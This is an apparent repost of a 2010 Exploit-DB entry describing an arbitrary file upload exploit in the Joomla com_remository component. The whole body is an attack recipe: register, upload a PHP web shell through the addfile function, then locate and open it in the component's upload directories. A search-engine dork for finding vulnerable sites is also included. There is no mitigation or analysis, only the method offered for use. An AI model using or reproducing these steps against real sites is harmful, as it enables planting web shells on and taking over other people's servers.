Joomla! Component com_remository – Arbitrary File Upload

• Exploit Database
• 13 阅读

• 作者： J3yk0ob
  日期： 2010-08-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14811/

• #################################################################
  # I N F O
  #
  # Exploit Title: Joomla com_remository Remote Upload File
  # Date: 2010-08-26 
  # Author: J3yk0ob
  # Home: http://www.J3yk0ob.com
  #
  #################################################################
  #E X P L O I T
  #
  #1. Register On Site
  #
  #2. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile
  #
  #3. Add your php file , example : shell.php
  #
  #4. http://www.Target.com/components/com_remository_files/
  #
  #5. If web server alowe to see directory you can see folder example : file_image_2
  #
  #6. You can find your shell in lates file_image_[latest Number]
  #
  #7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php
  #
  #Dork : inurl:"index.php?com_remository"
  #
  #################################################################
  # Contact Me
  #
  # Home : http://www.J3yk0ob.com
  # Email : 4dm1n@J3yk0ob.com
  #
  ##################################################################